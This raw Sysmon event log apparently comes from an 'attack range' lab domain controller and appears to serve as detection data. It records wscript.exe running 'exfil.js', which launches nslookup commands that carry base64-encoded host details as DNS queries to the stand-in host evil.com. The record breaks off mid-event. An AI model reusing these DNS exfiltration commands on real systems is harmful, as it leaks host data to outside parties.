154100x8000000000000000206080Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.022{2E1864BB-18E3-629A-6F42-000000005F02}7400C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlymth.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000206079Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206078Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206077Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206076Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206075Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206074Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.997{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6E42-000000005F02}7308C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000044793Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:24.627{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C5150BED454F7F1950B881FF2BC0C45,SHA256=9B46DEC580A649CFEDAF7B13DC2E7158CBEF3DE8841EF5DAA32253980F2A0A82,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.971{2E1864BB-18E4-629A-A142-000000005F02}25123712C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-A242-000000005F02}5696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.971{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206457Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.971{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206456Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.971{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206455Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.971{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206454Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.971{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-A242-000000005F02}5696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206453Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.971{2E1864BB-18E4-629A-A042-000000005F02}33086108C:\Windows\system32\cmd.exe{2E1864BB-18E4-629A-A242-000000005F02}5696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206452Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.977{2E1864BB-18E4-629A-A242-000000005F02}5696C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E4-629A-A042-000000005F02}3308C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgqwlze.tmp 2>&1 10341000x8000000000000000206451Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.950{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-A142-000000005F02}2512C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206450Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.950{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E4-629A-A142-000000005F02}2512C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206449Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.934{2E1864BB-18E4-629A-A142-000000005F02}25123712C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-A042-000000005F02}3308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206448Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.934{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-A142-000000005F02}2512C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206447Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.919{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206446Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.919{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206445Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.919{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206444Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.919{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206443Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.919{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E4-629A-A042-000000005F02}3308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206442Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.919{2E1864BB-18E0-629A-6742-000000005F02}39762568C:\Windows\System32\WScript.exe{2E1864BB-18E4-629A-A042-000000005F02}3308C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206441Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.921{2E1864BB-18E4-629A-A042-000000005F02}3308C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgqwlze.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206440Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.903{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlcsrtt.tmpMD5=3A2317C9FD900A859CF011E0E257F84B,SHA256=3526444D988B70677FDC7B72CFB724A402371630F20BEF65D3F298944DCB36B6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206439Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:24.887{2E1864BB-18E4-629A-9E42-000000005F02}62246324C:\Windows\system32\conhost.exe{2E1864BB-18E4-629A-9F42-000000005F02}3620C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206438Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 